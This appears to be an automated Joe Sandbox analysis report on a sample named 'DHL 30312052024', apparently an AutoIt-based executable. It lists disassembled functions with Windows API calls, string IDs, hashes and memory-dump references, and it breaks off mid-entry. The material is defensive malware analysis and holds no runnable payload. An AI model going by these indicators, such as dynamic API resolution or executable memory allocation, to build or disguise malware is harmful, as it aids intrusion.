                                                                                        • Opcode ID: 5e1d4389792f7cbbb21ed8615703d7557b5f878ee9a77af75e1e5f0652c55daf
                                                                                        • Instruction ID: 3ac8aa613536b6b9192e9ba82a52a6b3da0b6ae9d40e4d91a1883188ccfddd93
                                                                                        • Opcode Fuzzy Hash: 5e1d4389792f7cbbb21ed8615703d7557b5f878ee9a77af75e1e5f0652c55daf
                                                                                        • Instruction Fuzzy Hash: 46116A71510208ABEB10AF64DC45AEB37A9EB05378F604728F9B5971E0C631DC91A768
                                                                                        Function 00C58E05 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C58E73
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                        • API String ID: 372448540-2258501812
                                                                                        • Opcode ID: a47ca883cc6b6be2b61f892f1ffac7422c8f59a1c1e5f3bac725d15f44df3f33
                                                                                        • Instruction ID: 88e379bd5b50489ce893570916f09e07c4a4ed67bb6aab069e5d826ac3e4da29
                                                                                        • Opcode Fuzzy Hash: a47ca883cc6b6be2b61f892f1ffac7422c8f59a1c1e5f3bac725d15f44df3f33
                                                                                        • Instruction Fuzzy Hash: B701F579A01218ABCF14EBA0CC429FE7378AF01320B100B19BC31672D1DE31584CEA54
                                                                                        Function 00C58CFD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C58D6B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                        • API String ID: 372448540-2258501812
                                                                                        • Opcode ID: ef2883d68db546ba6fe1967522edf5859eb9a5e3dcaf3eec016a033186093655
                                                                                        • Instruction ID: 1eef040945584bbd6711c9715d94460873632fb6245f2a7dfb4ce4816b10f135
                                                                                        • Opcode Fuzzy Hash: ef2883d68db546ba6fe1967522edf5859eb9a5e3dcaf3eec016a033186093655
                                                                                        • Instruction Fuzzy Hash: 2101DF75A41109ABCF14EBA1C952AFF73B89F15341F100129BD06772E1DE215E0CE679
                                                                                        Function 00C58D82 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C07DE1: _memmove.LIBCMT ref: 00C07E22
                                                                                          • Part of subcall function 00C5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C5AABC
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C58DEE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: @U=u$ComboBox$ListBox
                                                                                        • API String ID: 372448540-2258501812
                                                                                        • Opcode ID: df22e3dfdd3c88aa9f964daf666478faf62bbfd7ea27505617fcd0c2946afb79
                                                                                        • Instruction ID: 3ed158af54ac07842deffa5fa35bdc6f40798bd66b1fa4f5b772aae2d439f860
                                                                                        • Opcode Fuzzy Hash: df22e3dfdd3c88aa9f964daf666478faf62bbfd7ea27505617fcd0c2946afb79
                                                                                        • Instruction Fuzzy Hash: 8201F275A41109ABDF14EAA4C942AFF73A88F11301F100125BC05732D2DE225E0DE679
                                                                                        Function 00C8ACCF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,00CC57B0,00C8D809,000000FC,?,00000000,00000000,?,?,?,00C3B969,?,?,?,?,?), ref: 00C8ACD1
                                                                                        • GetFocus.USER32 ref: 00C8ACD9
                                                                                          • Part of subcall function 00C02612: GetWindowLongW.USER32(?,000000EB), ref: 00C02623
                                                                                          • Part of subcall function 00C025DB: GetWindowLongW.USER32(?,000000EB), ref: 00C025EC
                                                                                        • SendMessageW.USER32(013BFD88,000000B0,000001BC,000001C0), ref: 00C8AD4B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Long$FocusForegroundMessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3601265619-2594219639
                                                                                        • Opcode ID: 1aa7d18801e76fd5c2560c1ddd2877b1bf03622f56db7e499accd3999923e6fb
                                                                                        • Instruction ID: 003b384c9e45b72f2a2df3a9760fd698c25febbc21191a4fe0cd80a96c621aa0
                                                                                        • Opcode Fuzzy Hash: 1aa7d18801e76fd5c2560c1ddd2877b1bf03622f56db7e499accd3999923e6fb
                                                                                        • Instruction Fuzzy Hash: 520192312005008FD724AB28D898F6A37E6EB89325B18027EF425C72F1DB31AC86CB54
                                                                                        Function 00C16063 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00C1603A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C16051
                                                                                        • SendMessageW.USER32(?,0000000C,00000000,?), ref: 00C1607F
                                                                                        • GetParent.USER32(?), ref: 00C50D46
                                                                                        • InvalidateRect.USER32(00000000,?,00C13A4F,?,00000000,00000001), ref: 00C50D4D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$InvalidateParentRectTimeout
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3648793173-2594219639
                                                                                        • Opcode ID: 7d6c87cc8fa45e1fce0fe4de770b9389ea2890fe7d44f7146254c4eebf22437c
                                                                                        • Instruction ID: 545631609603eea74f60074d123dc6da654c38afbd71a1e0daad5441a8a07500
                                                                                        • Opcode Fuzzy Hash: 7d6c87cc8fa45e1fce0fe4de770b9389ea2890fe7d44f7146254c4eebf22437c
                                                                                        • Instruction Fuzzy Hash: E3F0E530100204FBFF211F71DC09FD97B69AF0A340F204428F9459A0B0D6B368C1BB58
                                                                                        Function 00C04C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C04BD0,?,00C04DEF,?,00CC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C04C11
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C04C23
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: d49135f636494005cb8f6af103962c956bda5579c7a3d4090a38fb4bd2dba070
                                                                                        • Instruction ID: df0510e8bf0aa9bf6a6ee367dbafbc45f87f426c69289f75b75d6a2aeffa0c4b
                                                                                        • Opcode Fuzzy Hash: d49135f636494005cb8f6af103962c956bda5579c7a3d4090a38fb4bd2dba070
                                                                                        • Instruction Fuzzy Hash: A3D01771611713CFE720AF71DA0874FBAE5EF09752B118C3E9596D61A0E6B0D881CB64
                                                                                        Function 00C04C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00C04B83,?), ref: 00C04C44
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C04C56
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: 4dbbc10b41f492a594809723116779904b7ea8f2298eb3bf285945be2e2ba106
                                                                                        • Instruction ID: a988f5cab2f29e1d2eebff061319b397d0488a7934edd978e6fc846f393bae35
                                                                                        • Opcode Fuzzy Hash: 4dbbc10b41f492a594809723116779904b7ea8f2298eb3bf285945be2e2ba106
                                                                                        • Instruction Fuzzy Hash: 38D01771610713CFE7249F31D90875E7AE4AF05751B11883ED5A6D61A4E670D8C0CB64
                                                                                        Function 00C80DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00C81039), ref: 00C80DF5
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C80E07
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: 42250de237a3f5a1a97617d124317c23fb1f6f81ca40980cb8f09d0892d278d0
                                                                                        • Instruction ID: ff076d7d124c26a6cdebe7c87b7d6074d0e2962b32998ee6d151613062f51da6
                                                                                        • Opcode Fuzzy Hash: 42250de237a3f5a1a97617d124317c23fb1f6f81ca40980cb8f09d0892d278d0
                                                                                        • Instruction Fuzzy Hash: 3DD0C730540322CFC320AFB0C8083CBB2E4AF04342F208C3E95D2C2150E6B0E894CB08
                                                                                        Function 00C790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00C78CF4,?,00C8F910), ref: 00C790EE
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00C79100
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: 66655a3be8d6f7ee6e22c649a0e5a775d49cdcafbbf97706ce766c7bbd925b2e
                                                                                        • Instruction ID: 334a8270f6c50865c50a3aecd787bad0737df2972239475be974ac621808fd54
                                                                                        • Opcode Fuzzy Hash: 66655a3be8d6f7ee6e22c649a0e5a775d49cdcafbbf97706ce766c7bbd925b2e
                                                                                        • Instruction Fuzzy Hash: 9BD01735610723CFDB209F79D81C75E76E8AF05751B52C83E949AD6590EA70D890CB90
                                                                                        Function 00C41714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: 967616d960086b5ea77269f9714e4933937481ca84585896cfe04bcf5d058c2f
                                                                                        • Instruction ID: 55c1c1abdfd7b233f8fa943c7ac17777affb24dadb5dee5cbdbc3536a2dd27dd
                                                                                        • Opcode Fuzzy Hash: 967616d960086b5ea77269f9714e4933937481ca84585896cfe04bcf5d058c2f
                                                                                        • Instruction Fuzzy Hash: 2DD01771C48118FACB109B9298889FD737CBB08301F280562B952A2080E2369BD4EA25
                                                                                        Function 00C5717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ed6b6fe012ad1bef909e3a51a5cca8fef07d7ec2ba6d62fbbc495b0faeb53e53
                                                                                        • Instruction ID: 7fcb26224ff1dd363cb11fb230d08bf56435baf63782d9951e9f2a9276ec3e4f
                                                                                        • Opcode Fuzzy Hash: ed6b6fe012ad1bef909e3a51a5cca8fef07d7ec2ba6d62fbbc495b0faeb53e53
                                                                                        • Instruction Fuzzy Hash: D1C17D79A04216EFCB14CF94D884AAEBBB5FF48311B108698EC15DB251D730DEC5DB94
                                                                                        Function 00C7E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00C7E0BE
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00C7E101
                                                                                          • Part of subcall function 00C7D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C7D7C5
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00C7E301
                                                                                        • _memmove.LIBCMT ref: 00C7E314
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3659485706-0
                                                                                        • Opcode ID: b9e63829d35d8864a4d9e7d915863940421e96931c53ee6984034a0e7b920afa
                                                                                        • Instruction ID: cfa62f1ac321b5cf1441dd94accff4d61bfad4aff48267436abef25edcb533d5
                                                                                        • Opcode Fuzzy Hash: b9e63829d35d8864a4d9e7d915863940421e96931c53ee6984034a0e7b920afa
                                                                                        • Instruction Fuzzy Hash: 99C11A716083119FC714DF28C481A6ABBE4FF89714F14896EF8999B352D731EA46CB82
                                                                                        Function 00C78093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00C780C3
                                                                                        • CoUninitialize.OLE32 ref: 00C780CE
                                                                                          • Part of subcall function 00C5D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C5D5D4
                                                                                        • VariantInit.OLEAUT32(?), ref: 00C780D9
                                                                                        • VariantClear.OLEAUT32(?), ref: 00C783AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        • Opcode ID: f892fdc2cc9c60f321e5b9c8c1038dbe40c18cd16413227f1a7dd9d6f74d09ba
                                                                                        • Instruction ID: 7ac6aafe79474a96ef7bd1ccba675ed4ce04460d52394d6ebffaf19b11519141
                                                                                        • Opcode Fuzzy Hash: f892fdc2cc9c60f321e5b9c8c1038dbe40c18cd16413227f1a7dd9d6f74d09ba
                                                                                        • Instruction Fuzzy Hash: 26A169756047019FCB10DF25C485B2AB7E4FF89324F148548FA9A9B3A2CB30ED09DB82
                                                                                        Function 00C57530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C92C7C,?), ref: 00C576EA
                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C92C7C,?), ref: 00C57702
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00C8FB80,000000FF,?,00000000,00000800,00000000,?,00C92C7C,?), ref: 00C57727
                                                                                        • _memcmp.LIBCMT ref: 00C57748
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 314563124-0
                                                                                        • Opcode ID: 7c86a2e74a6bdc991804d1e9d6f8ccf711ae1465f24635a249ce4b98495f79bd
                                                                                        • Instruction ID: 8b5b0993e53673a6d837714ee4a970015e6397d2d1d58c2979dc6caa1b90a054
                                                                                        • Opcode Fuzzy Hash: 7c86a2e74a6bdc991804d1e9d6f8ccf711ae1465f24635a249ce4b98495f79bd
                                                                                        • Instruction Fuzzy Hash: 38811C75A00109EFCB04DFA4D984EEEB7B9FF89315F204158F515AB250DB71AE8ACB60
                                                                                        Function 00C5687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        • Opcode ID: 5d4cf670135fc5060c40eb1380a60d0780cadf931620a52e9d3d6c7f2bcc3e26
                                                                                        • Instruction ID: a1ffd642ab23e3b551a3403cad49e8600e9128fd60f5fe1249017bbd8c6da27c
